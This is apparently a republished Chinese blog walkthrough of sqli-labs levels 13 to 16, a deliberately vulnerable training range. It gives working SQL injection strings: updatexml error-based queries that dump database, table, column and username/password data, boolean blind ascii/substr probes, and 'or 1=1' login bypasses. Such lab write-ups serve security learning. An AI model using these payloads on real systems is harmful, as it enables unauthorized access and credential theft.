自学内容网 自学内容网
自学内容网 > 正文

sqli-labs靶场13-16关(每日4关)持续更新!!!

🕗 发布于 2024-11-16 11:19 数据库  

Less-13

首先上来判断闭合方式是什么,我们输入1' ,看看页面回显情况

1后面有个括号,那我们输入 1') #  看一下页面回显

发现页面不报错了,但是没有回显内容,我们联想一下前几道题,页面回显不改变,会用到报错注入和盲注两种方式 ,要是盲注的话,布尔盲注和时间盲注这俩的页面回显会有变动,所以我们这道题选择报错注入,报错注入的方式还是用updatexml。

//updatexml格式   

updatexml(xml_doument,Xpath_String,new_value);

我们使用:updatexml(1,concat(0x7e,(...),0x7e),1); 

1.获取数据库

') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

2.获取表

')and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #

 

3.获取列

') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) #

我们会发现出来这条语句,怎么没有username和password呀,我们忽略了一点,updatexml报错有报错字符大小限制,不能完全显示出来,所以我们就不用group了,我们用limit,一个个试一试

//usename

') and updatexml(1,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='users' limit 4,1),0x7e),1) #

 

//password

') and updatexml(1,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='users' limit 5,1),0x7e),1) #

 

4.获取字段

也是用limit,让他们一个个输出

') and updatexml(1,concat(0x7e,(select concat(username,password) from users limit 0,1),0x7e),1) #

成功!!!

Less-14

发现和上一关一样,说明还是报错注入

那我们就判断闭合方式即可,其余步骤和上一关做法一样

说明闭合方式是双引号

直接显示最后一步,输出字段,也是用limit一次一次输出

"and updatexml(1,concat(0x7e,(select concat(username,password) from users limit 0,1),0x7e),1) #

 

Less-15

判断注入点,闭合方式,输入万能密码 'or 1=1 #   发现页面只显示登陆成功,其余又不显示,看题干,那就是盲注中的布尔盲注了。

1.获取数据库长度(需要自己去尝试),登陆成功说明正确

' or length(database()) = 8 #

 

1.获取数据库,因为我们并不知道用户名是什么,所以用or

//secutity

' or ascii(substr((select database()),1,1)) = 115 #

...

2.表名

//长度

' or (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 # 

//emails

' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 101 #

...

3.列名

//长度

' or (select length(column_name) from information_schema.columns where table_name='emails' limit 0,1) = 2 #

' or (select length(column_name) from information_schema.columns where table_name='emails' limit 1,1) = 8 #

//id

' or ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) = 105 #

...

//email_id

' or ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1)) = 101 #

...

4.字段

//长度

'or (select length(email_id) from emails limit 0,1) = 16 #

//Dumb@dhakkan.com

# 第一个字段第一个字母是 D

' or ascii(substr((select email_id from emails limit 0,1),1,1)) = 68 #

 Less-16

和第15关一样,就是闭合方式有区别

本关的闭合方式是   ")

先用万能密码登录,测试闭合方式

") or 1=1 # 

登陆成功!

其余步骤和第15关一样 


原文地址:https://blog.csdn.net/longnice666/article/details/143805018

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!

相关文章

  • matlab--pdist2(X,Y)使用方法、怎么计算的

    定义一个忽略NaN值坐标的自定义距离函数,并使用该自定义距离函数计算两两距离。假设缺少X(1,1)。%假设缺少 X(1,1)。%计算汉明距离输出:D1 =如果X中的观测值i或Y中的观测值j包含NaN值

    阅读更多2024-11-17
  • web H5网页中嵌入优量汇的插屏广告

    如果你的商品 没有上架应用市场 就选择测试 上架成功之后可以选择正式 媒体审核成功之后 就可以下一步。我们在进入某些App 软件的时候 经常会看到一些插屏广告 , 因为看着些广告可以赚取费用。这样就可

    阅读更多2024-11-17
  • JDBC-Dao层模式

    分层思维是软件架构设计的一种重要思想,它通过将应用程序划分为多个关系的层。通常分为以下三层关系。web层:主要负责与用户进行交互,处理请求。service层:业务逻辑层,主要负责处理应用程序的业务逻辑

    阅读更多2024-11-17
  • JAVA接入WebScoket行情接口

    之前爬行情网站提供的level1行情接口不稳定。websocket接入level2行情接口。Java脚好用的库很多,开发效率一点不输Python。如果是日内策略,需要更实时的行情数据,不然策略滑点太大

    阅读更多2024-11-17
  • 前端页面一些小点

    1. 让输入框无边框。

    阅读更多2024-11-17
  • 以太坊基础知识结构详解

    EVM:一个沙盒环境,负责执行智能合约代码。它是图灵完备的,支持多种编程语言,确保智能合约的安全执行。以太坊的区块是区块链的基本组成单位,每个区块包含一组交易记录,并通过哈希值与前一个区块相连,形成链

    阅读更多2024-11-17
  • Spring Boot 中 Druid 连接池与多数据源切换的方法

    Druid是阿里巴巴开源的一个数据库连接池,它不仅提供了高效的数据库连接管理,还具备监控、扩展等强大功能。监控能力:提供了详细的监控页面,可以实时监控SQL执行情况、连接池状态等。扩展能力:支持多种数

    阅读更多2024-11-17
  • 【MySQL】MySQL中的函数之JSON_KEYS

    在 MySQL 中,函数用于获取 JSON 对象中的所有键名。这个函数非常有用,特别是在你需要知道 JSON 对象中包含哪些键时。下面是一些关于如何使用的详细说明和示例。

    阅读更多2024-11-17
  • C++ 模板

    模板是另一个编程思想(泛型编程)的一种技术。模板就是建立通用的模具,大大提高复用性。一寸照片模板:模板的使用前提:模板不能直接使用,需要塞入我们自己的内容。模板不是万能的(例如不能用PPT模板去套一寸

    阅读更多2024-11-17
  • 【C++】定义缓冲区数组,但出现0xCCCCCCCC的情况,导致未定义行为,Visual Studio 调试器可以查看

    【C++】定义缓冲区数组,但出现0xCCCCCCCC的情况,导致未定义行为,Visual Studio 调试器可以查看

    阅读更多2024-11-17
自学内容网
Copyright © 2015-2024